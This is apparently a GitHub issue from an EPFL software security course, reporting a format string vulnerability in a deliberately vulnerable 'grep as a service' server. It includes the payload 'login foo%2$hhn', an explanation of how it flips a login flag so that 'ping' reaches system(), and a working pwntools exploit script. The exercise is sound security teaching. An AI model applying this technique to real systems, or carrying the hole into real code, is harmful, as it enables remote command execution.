search

xavierpantet / my_ass_on_your_grass

Software Security (CS-412) project at EPFL. Vulnerable GRep AS a Service.
0 stars 1 forks source link

Format string vulnerability found #8

Open yannvon opened 5 years ago

yannvon commented 5 years ago

Where

https://github.com/xavierpantet/my_ass_on_your_grass/blob/5ebeb6c98d689621444de3275847f134462da9b7/src/services/authentication/AuthenticationService.cpp#L17

https://github.com/xavierpantet/my_ass_on_your_grass/blob/5ebeb6c98d689621444de3275847f134462da9b7/src/commands/Commands.cpp#L391-L394

What

Format string vulnerability The AuthenticationService class has a method registerUser(), that registers a user after the login command, by creating a corresponding instance of the User class. This User class has a integer attribute called "login", that does not seem important towards the servers functionality as it is always set to 0. However, as it is passed to a vulnerable snprintf() call on line 17 of AuthenticationService.cpp, this login variable can be changed to an arbitrary value, which in turn can unlock some interesting code behavior. When after changing this login variable to a nonzero value a "ping $HOSTNAME" command is executed, the $HOSTNAME value is actually given as parameter to a system() call, which of course gives full server access to an attacker.

Exploit

1. Start both client and server
2. Perform format string attack by sending "login foo%2$hhn"
3. Profit, by sending "ping xcalc" for example, which opens a calculator.

The format string is such that first at least one character is printed ("foo"), then, as the address of the login variable on the stack is given as second parameter to the snprintf() function, the current number of characters written so far (3) can be written to that address by using the %n format string, as well as "2$" to access the second parameter.

The following python code can perform these steps when run from the project root directory:

from pwn import *

server = process('bin/server')
log.info("Waiting 1s to make sure server is up and running")
sleep(1)
client = process(['bin/client', '127.0.0.1', '8080'])

format_exploit = "login a%2$hhn"

log.info("Sending format exploit to server: " + format_exploit)
client.sendline(format_exploit)

log.info("Sending ping xcalc")
client.sendline("ping xcalc")

log.info("Sleeping 5s to display calculator")
sleep(5)

# Clean up
client.close()
server.close()
guillaumemichel commented 5 years ago

Congrats you found a vulnerability!